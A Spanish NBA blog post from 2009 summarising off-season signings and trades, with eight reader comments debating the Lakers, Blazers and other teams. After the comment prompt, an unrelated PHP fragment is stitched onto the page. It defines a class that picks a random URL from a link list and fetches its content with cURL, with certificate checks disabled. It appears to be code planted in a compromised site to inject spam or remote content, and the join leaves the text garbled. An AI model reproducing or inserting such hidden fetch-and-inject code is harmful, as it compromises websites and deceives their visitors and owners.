Últimas noticias del “Mercato”

15 de July de 2009 por txusma

Desde el fichaje de Marion por los Mavs, McDyess por los Spurs y Ben Gordon y Villanueva por los Pistons habíamos dejado un poco de lado todo lo referido al mercado de fichajes de la NBA. Cierto es que no se han producido movimientos protagonizados por jugadores del renombre de los anteriores pero tampoco podemos decir que no ha pasado nada importante en estas fechas.

El nombre de estos últimos días es, sin duda, el de Lamar Odom. El, de momento, jugador de los Lakers ha estado mareando la perdiz todo este tiempo y finalmente los Lakers se han cansado de no recibir ninguna respuesta a las ofertas que habían presentado al alero de New York. La franquicia angelina le ofrecía 36 millones en 4 temporadas o 30 en 3 y Odom, que parece que buscaba un contrato por 5 temporadas, ni se ha dignado a coger el teléfono para responder. Así que ahora mismo las conversaciones están rotas aunque no se descarta que en un futuro se puedan retomar aunque, evidentemente, la oferta de los Lakers será sustancialmente más baja. Odom, por su parte, está en conversaciones con Mavs y Heat que le podrían ofrecer contratos de 5 años aunque tan solo por la MidLevel (5,8 millones por año). Veremos como acaba todo esto pero de confirmarse la salida de Odom supondría un serio revés a las aspiraciones de los amarillos para revalidar su título.

Pero también tenemos alguna información más en formato reducido:

– La salida de Carlos Boozer de Utah podría estar cerca y su destino podría ser Chicago. Se habla también del interés de los Heat que podrían ofrecer el expiring de Udonis Haslem a cambio.
– Hablando de los Jazz hay que decir que han renovado a Mehmet Okur por 2 años y 21 millones y que parece que renovarán a Paul Millsap igualando la oferta presentada por los Blazers.
Grant Hill se queda un año más en Phoenix a cambio de 3 millones de dólares. Además los Suns se han hecho con los servicios de Channing Frye gracias a la excepción bianual (2 años, 3.8 millones) y han efectuado el buyout del contrato de Ben Wallace.
– Toronto ha presentado al base de los Pacers Jarrett Jack una oferta de 20 millones y 4 años de duración.
– Orlando Magic se ha hecho con los servicios de Brandon Bass a cambio de 18 millones de dólares en 4 años. Además ha igualado la megaoferta presentada por los Mavs a Marcin Gortat. Recordemos que era de 34 millones en 5 años.
– Los Cavs han fichado a Anthony Parker por 2 años y 6 millones de dólares. De esta manera Cleveland conforma un equipo preparado para luchar por todo.
– Los Pistons han traspasado a Arron Affalo y Walter Sharpe a los Nuggets a cambio de una futura segunda ronda del draft.
– Los Clippers también están interesados en Allen Iverson al que podrían ofrecer la Mid Level (5.8 millones) durante un año. ¡Quién te ha visto y quien te ve, Allen!
Sean May busca equipo tras abandonar los Bobcats. Realizará workouts con los Blazers, Clippers, Heat y Cavs para demostrar que está en buenas condiciones físicas, algo de lo que no ha gozado en su corta carrera en la NBA.
– Olimpiakos, aparte de retener a Josh Childress, apunta a otros jugadores de la NBA como Nate Robinson o Ramon Sessions.

Comenta

8 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Las ofertas que ofrecen los Lakers son una pasada para Odom. Va listo si cree que alguien le va a ofrecer algo superior… aún teniendo en cuenta todo lo que ya hemos visto este verano.
    Si se ha pasado haciéndose el “longuis” me parece perfecto que los Lakers peguen un puñetazo encima la mesa. Será una putada no tenerlo, pero más putada es bajarte los pantalones hasta las rodillas que es lo que pretende Odom. Para mí ni de coña vale 10 kilos por temporada para un rol de 6º hombre.

    Si se va… pues a otra cosa. A intentar sacar rendimiento a los Bynum, Morrison y Powell ¿qué le vamos a hacer?? Tampoco creo que sea una debacle.

    En otro orden de cosas, me parecen bastante acertados los movimientos de Orlando y Cavaliers.
    Nelson-Carter-Lewis-Bass-Howard por un lado y Williams-Parker-Lebron-Varejao-Shaq por el otro, con sus respectivas buenas segundas unidades. La temporada que se presenta es bestial.

      Citar

  2. Óscar dice:
    #2

    Una pena pero ya tiene mala pinta lo de los Blazers. Ni Turkoglu, ni Millsap, ni Andre Miller,…
    Necesita otro interior como el comer, y parece que lo mejor podría ser Sean May, toda una incógnita. Y eso que parecía que tenía grandes posibilidades por el margen salarial… Ahora los 9 millones de Darius Miles pesan y mucho, un Miles que por cierto no seguirá en Memphis. En fin, aún hay tiempo para el “mago” Pritchard.

      Citar

  3. Óscar dice:
    #3

    Bueno, ni tampoco Ariza, que para mí era el refuerzo perfecto para Portland y tampoco se ha podido. Las elecciones del draft sí me han gustado mucho, sobre todo Claver por supuesto pero también Cunningham, Pendergraph (interiores) y el base australiano Patrick Mills. Yo creo que se quedarán los tres, y Claver en un añito puede ser un jugadorazo, si le respetan las lesiones.

      Citar

  4. Óscar dice:
    #4

    “Portland firma contrato al base Andre Miller.”
    Qué ganas tenía de que esta noticia saliera en Mercado NBA. Bueno, ahora sólo falta un “cuatro” de cierto nivel para completar una gran plantilla.
    Miller era necesario para aportar la solidez, experiencia y toma de decisiones correcta en momentos decisvos, donde se desinflaban los Blazers. Sigue siendo un equipo joven, pero ahora con más liderazgo y una opción ofensiva más, descargando a Roy, con Blake como un buen base suplente y no como un titular del montón.
    El “roster” a día de hoy es éste:
    1/ MILLER—BLAKE—MILLS (R)
    2/ ROY—FERNÁNDEZ—BAYLESS
    3/ WEBSTER—OUTLAW—BATUM
    4/ ALDRIDGE—“NUEVO?”—CUNNINGHAM (R)
    5/ ODEN—PRZYBILLA—PENDERGRAPH (R)

    Para mí, la clave está en el rendimiento de Webster y Oden, en cuanto a que les respeten las lesiones.
    ¿Qué os parece? ¿A qué puede aspirar Portland 09-10?

      Citar

  5. TheDeerHunter dice:
    #5

    tiempo habrá para analizarlo con detenimiento… la incorporación es importante. Soy de los que tiene cierta debilidad por la inteligencia en cancha de André Miller… y sin embargo, no termino de entender en qué dirección se mueven.
    Dijo McMillan, tras caer su equipo contra Houston, que necesitaba más músculo en su equipo… se habló de traer a Turkoglu y ahora traen a Miller… de lo más musculoso del mundo, oiga

    Con todo, normalmente, Portland puede ser perfectamente un top 4 en el oeste… y si mueven bien sus cartas no tardará mucho en que sean los primeros. De esto último es de lo que más dudas tengo.

      Citar

  6. TheDeerHunter dice:
    #6

    Que por cierto, no sé donde has visto tú la noticia de lo de André Miller. No la encuentro por ningún lado.

      Citar

  7. Óscar dice:
    #7

    Thedeer., lo ves en Mercado NBA, en Hispanos NBA o en nba.com, lo dan por hecho pero no se sabe aún cuantos años de contrato (3?) y por cuantos mill. $ ( unos 5 ó 6 ).
    Sobre lo que decís en “Y el mercado se mueve” , que Blake seguría de titular… admiro mucho a McMillan y me gusta como entrenador para este equipo tan joven, pero no creo que Miller no sea titular. Espero…

      Citar

  8. Óscar dice:
    #8

    Pues es cierto, acabo de ver las declaraciones de McMillan que no quiere tocar nada de la “química” del equipo, y que ve en Miller un buen recurso de banquillo…. Si él lo ha dicho y con lo clarito que lo tiene siempre, la decisión está tomada. Si lo quieres ver de forma positiva, vaya banquillo va a tener Portland, sobre todo con MIller, Rudy o Outlaw, que yo creo que va a jugar mucho de “4” si Webster está a tope.
    Sólo queda que Andre acepte su rol, pero yo no lo veo por sus características como suplente, y menos de Blake, que para mí era el menos bueno de los bases de los 16 equipos de los últimos playoffs. Nate es mucho Nate, igual es todo un acierto…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>